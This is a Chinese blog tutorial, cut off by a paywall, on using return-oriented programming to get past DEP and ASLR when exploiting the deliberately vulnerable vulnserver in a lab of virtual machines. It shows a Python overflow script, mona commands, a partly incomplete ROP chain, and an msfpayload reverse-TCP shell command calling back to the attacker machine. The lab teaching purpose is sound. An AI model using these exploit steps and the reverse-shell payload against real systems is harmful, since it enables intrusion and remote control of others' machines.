【网络安全】Rop绕过DEP和ASRL流程实例介绍

最新推荐文章于 2024-04-09 14:38:17 发布
最新推荐文章于 2024-04-09 14:38:17 发布
阅读量8.2k 收藏 2
点赞数
分类专栏: Network Security 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jiayanhui2877/article/details/48496145
版权
本文详述了如何在操作系统具备DEP和ASLR保护的情况下,通过Rop技术绕过防御,执行漏洞利用。使用ImmunityDebugger、mona插件等工具,确定崩溃点,生成ROP链和Shellcode,最终实现从Kali Linux对Windows系统的远程控制。
摘要由CSDN通过智能技术生成

本文主要介绍带DEP防护和ASLR功能的操作系统或软件如何被绕过,从而执行漏洞利用和攻击,其它相关知识领域请自行上网搜索。
1、工具软件
ImmunityDebugger1.85
mona 插件
python 2.7.1
vulnserver
win7虚拟机开启所有程序的DEP防护并运行vulnserver,ip 192.168.254.154
kali1.0虚拟机执行攻击脚本,ip 192.168.254.155
打包下载地址:http://download.csdn.net/detail/jiayanhui2877/9111687
查看是否开启了全防护wmic OS Get DataExecutionPrevention_SupportPolicy
如果返回值不是3请自行设置DEP全防护
2、流程方法
使用如下脚本测试vulnserver在接收多少数据后崩溃,通过测试发现在2006字节后崩溃,说明函数ret时,eip执行到此地址处为非法地址程序崩溃,所以制作exploit时,在2006字节后应该为rop_chains,之后为shellcode.

#!/usr/bin/python

import socket
server = '192.168.254.154'
sport = 9999

#length = int(raw_input('length of attack: '))
prefix = 'A' * 1000
chars = ''

for i in range(0x30,0x35):
    for j in range(0x30,0x3A):
        for k in range(0x30,0x3A):
            chars += chr(i) + chr(j) + chr(k) + 'A'

print chars,"\r\n"
attack = prefix + chars

s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect = s.connect((server,sport))

print s.recv(1024)
print "Sending attack to trun . with lenght ", len(attack)
s.send(('TRUN .'+ attack + '\r\n'))
print s.recv(1024)
s.send('EXIT\r\n')
s.close()

3、生成rop链
详细命令如下:

!mona -h //查看帮助
!mona modules //查看模块信息包括哪些模块使用了ASLR
!mona jmp -r esp -m essfunc.dll //查找jmp esp
//jmp esp \xFF\xE4
!mona asm -s jmp esp //将jmp esp转为汇编码
!mona find -s "\xFF\xE4"  -m essfunc.dll //搜索汇编码
!mona rop -m *.dll -cp nonull //生成rop链

 *** [ Python ] ***

def create_rop_chain():

                   # rop chain generated with mona.py - www.corelan.be
                   rop_gadgets = ""
                   rop_gadgets += struct.pack('<L',0x00000000)    # [-] Unable to find gadgets to pickup the desired API pointer into esi
                   rop_gadgets += struct.pack('<L',0x00000000)    # [-] Unable to find ptr to &VirtualAlloc()
                   rop_gadgets += struct.pack('<L',0x00402a25)    # POP EBP # RETN [vulnserver.exe]
                   rop_gadgets += struct.pack('<L',0x625011af)    # & jmp esp [essfunc.dll]
                   rop_gadgets += struct.pack('<L',0x625011d8)    # POP EBX # RETN [essfunc.dll]
                   rop_gadgets += struct.pack('<L',0x00000001)    # 0x00000001-> ebx
                   rop_gadgets += struct.pack('<L',0x625011fc)    # POP EDX # RETN [essfunc.dll]
                   rop_gadgets += struct.pack('<L',0x00001000)    # 0x00001000-> edx
                   rop_gadgets += struct.pack('<L',0x6250120c)    # POP ECX # RETN [essfunc.dll]
                   rop_gadgets += struct.pack('<L',0x00000040)    # 0x00000040-> ecx
                   rop_gadgets += struct.pack('<L',0x6250195e)    # POP EDI # POP EBP # RETN [essfunc.dll]
                   rop_gadgets += struct.pack('<L',0x6250172c)    # RETN (ROP NOP) [essfunc.dll]
                   rop_gadgets += struct.pack('<L',0x41414141)    # Filler (compensate)
                   rop_gadgets += struct.pack('<L',0x625011b4)    # POP EAX # RETN [essfunc.dll]
                   rop_gadgets += struct.pack('<L',0x90909090)    # nop
                   rop_gadgets += struct.pack('<L',0x00000000)    # [-] Unable to find pushad gadget
                   return rop_gadgets

rop_chain = create_rop_chain()

4、生成shellcode

msfpayload windows/shell_reverse_tcp LHOST="192.168.254.155" LPORT=443 EXITFUNC=thread R | msfencode -e x86/shikata_ga_nai -b '\x00'

输出:
最低0.47元/天 解锁文章
Walter_Jia
关注
专栏目录
[网络安全自学篇] 五十五.Windows系统安全之构建ROP绕过DEP及原理详解
杨秀璋的专栏
03-03 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了基于SEH异常处理机制的栈溢出漏洞,利用一个恶意的请求头部(HEAD或GET)引起缓冲区溢出,从而改写SEH链的地址并反弹Shell。本文将讲解DEP堆栈执行保护机制,通过构造ROP链来绕过DEP保护,重点利用VirtualProtect,最终编写漏洞利用脚本并实现自动化攻击。基础性文章,希望对您有所帮助。
ROP例子
fa1c4的blog
02-07 434
下面来举一个简单的ROP攻击技术的例子 #include<stdio.h> #include<unistd.h> #include<dlfcn.h> void vuln_func(){ char buf[128]; read(STDIN_FILENO, buf, 256); } int main(int argc, char *argv[]){ void *handle = dlopen("libc.so.6", RTLD_NOW | RTLD_
ROP技术绕过DEP--MPlayer栈溢出漏洞
weixin_30251587的博客
06-02 468
一、前言 1.1 DEP介绍 数据执行保护 (DEP) 是一套软硬件技术,能够在内存上执行额外检查以防止在不可运行的内存区域上执行代码。 在 Microsoft Windows XP Service Pack 2、 Microsoft Windows Server 2003 Service Pack 1 、 Microsoft Windows XP Tablet PC Edition 2005...
[pwn]ROP绕过ASLR&NX
Breeze的博客
05-27 1万+
# [详细] ROP绕过ASLR&NX 这次使用的程序是Defcon - 2015初赛题目,r0pbaby,也是一道经典的pwn题目了。 NX策略是指在栈中的代码不会被执行,ASLR是使共享库的装载位置随机化不可预测。 信息搜集 首先查看是64位还是32位文件: 然后查看安全策略: 可见开启了NX和PIE,PIE也就是ASLR。然后在IDA中查看伪代码,无需详细阅读,直接找溢出函数即...
ret2libc3_通过 ROP 绕过 DEP 和 ASLR 防护
Jc
05-08 819
题目:link > 2jfn 引 ROP的全称为 Return-oriented programming(返回导向编程),这是一种高级的内存攻击技术可以用来绕过现代操作系统的各种通用防御(比如内存不可执行和代码签名等)。 常见的程序流劫持就是栈溢出,格式化字符串攻击和堆溢出。 通过程序流劫持,攻击者可以控制PC指针从而执行目标代码。为了应对这种攻击,系统防御者也提出了各种防御方法,最常见的...
55.Windows漏洞利用之构建ROP绕过DEP并获取Shell1
08-03
本文主要介绍了如何在Windows环境中利用漏洞,尤其是针对DEP(Data Execution Prevention)堆栈执行保护机制,通过构建ROP(Return-Oriented Programming)链来绕过防御,并最终获取Shell。以下是对文章内容的详细...
DEP绕过1
08-08
DEP绕过1 DEP(Data Execution Prevention,数据执行防护)是一种...DEP绕过1主要涉及ROP链的构造和DEP机制的绕过。我们可以使用 Immunity Debugger 和 Mona.py 等工具来自动构造ROP链,并使用ROP链来绕过DEP机制。
ROP攻击实战:利用返回导向编程绕过DEP
它利用了堆栈中的返回指令,使攻击者能够绕过数据执行保护(DEP)机制并执行恶意代码。ROP攻击利用了程序中代码的重用性,在不需要代码注入的情况下实现对系统的控制。 ## 1.2 了解返回导向编程 返回导向编程...
Windows Shellcode学习笔记——通过VirtualProtect绕过DEP
weixin_34004576的博客
09-20 1842
本文讲的是Windows Shellcode学习笔记——通过VirtualProtect绕过DEP, 0x00 前言 在掌握了栈溢出的基本原理和利用方法后,接下来就要研究如何绕过Windows系统对栈溢出利用的重重防护,所以测试环境也从xp转到了Win7(相比xp,Win7的防护更全面)。本文将要介绍经典的DEP绕过方法——通过VirtualProte...
利用 ROP 技术绕过 DEP 保护的一次简单尝试
CuiXY's Blog
09-23 1775
\x 01 前言 DEP是数据执行保护的英文缩写,全称为Data Execution Prevention。数据执行保护(DEP) 是一套软硬件技术,能够在内存上执行额外检查以帮助防止在系统上运行恶意代码,在 Microsoft Windows XP ServicePack 2及以上版本的Windows中,由硬件和软件一起强制实施DEP(这个技术还是比较老的了)。自从这个技术出现以来也出现...
内存保护机制及绕过方法——利用Ret2Libc绕过DEP之ZwSetInformationProcess函数
weixin_30911451的博客
05-11 472
1. DEP内存保护机制 1.1 DEP工作原理 分析缓冲区溢出攻击,其根源在于现代计算机对数据和代码没有明确区分这一先天缺陷,就目前来看重新去设计计算机体系结构基本上是不可能的,我们只能靠向前兼容的修补来减少溢出带来的损害,数据执行保护DEP就是用来弥补计算机对数据和代码混淆这一天然缺陷的。 DEP的基本原理是将数据所在内存页标识为不可执行,当程序溢出成功转入shellcode时...
利用ROP绕过DEP(Defeating DEP with ROP)调试笔记
weixin_33947521的博客
03-08 827
Debug_Orz · 2014/11/05 10:190x00 背景本文根据参考文献《Defeating DEP with ROP》,调试vulserver,研究ROP (Return Oriented Programming)基本利用过程,并利用ROP绕过DEP (Data Execution Prevention),执行代码。 0x00 ROP概述 缓冲区溢出的目的是为了控制EIP,从而执行...
Windows下DEP保护机制详解及其绕过
最新发布
WdIg-2023的博客
04-09 832
在开始DEP保护机制的介绍之前,想一想没有开保护时我们的攻击过程,以及开了我们前面介绍的GS和SafeSEH保护的攻击过程,相信大家都能发现一个问题:就是我们本来写入数据区的数据被当作代码执行了,那么站在一个开发者的角度,我们该如何避免这种问题?
利用WPN与ROP绕过DEP保护机制
如鹿渴慕泉水的专栏
05-04 1412
利用WPN与ROP绕过DEP保护机制作者:Sud0译者:riusksk (泉哥:http://riusksk.blogbus.com) 前言对于本教程,假设读者具备以下条件:1. 在电脑拥有各项所需工具的实验环境;2. 具备编写栈溢出利用程序的基础;3. 掌握SEH概念及利用SEH编写exploit的基础知识。 基础概念DEP(Data Execution Prevention):防止一些内存位置...
DEP原理及关闭
热门推荐
dongyewolong的专栏
11-14 2万+
一、原理   DEP - 数据执行保护的缩写,Data Execution Prevention。 他是一套软硬件技术,能够在内存上执行额外检查以帮助防止在系统上运行恶意代码。其基本原理是将数据所在内存页标识为不可执行,当程序溢出成功转入shellcode时,程序会尝试在数据页面上执行指令,此时CPU就会抛出异常,而不是去执行恶意指令。如图所示           DEP 的主要作用是阻
渗透之——使用Metasploit编写绕过DEP渗透模块
冰河的专栏
01-17 3041
转载请注明出处:https://blog.csdn.net/l1028386804/article/details/86522445 攻击机 Kali 192.168.109.137 靶机 WinXP 192.168.109.141 (也可为其他Win系统,设置为DEP保护) 应用程序 Vulnserver(可以到链接: https://download.csdn.net/download/...
内存安全试验:ret2libc绕过DEP
weixin_42072280的博客
05-08 740
参考资料 1.https://www.cnblogs.com/0831j/p/9219243.html (实验、原理) 2.https://www.cnblogs.com/xidian-wws/p/10819073.html(getenvaddr那个的说明) 实验过程中的一些问题 ...
Windows漏洞利用开发——利用ROP绕过DEP保护
weixin_49816179的博客
12-24 497
1.了解DEP保护 2.理解构造ROP链从而绕过DEP的原理,重点理解利用VirtualProtect 3.计算偏移量 4.利用mona创建ROP链 5.编写漏洞利用脚本,自动化攻击
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值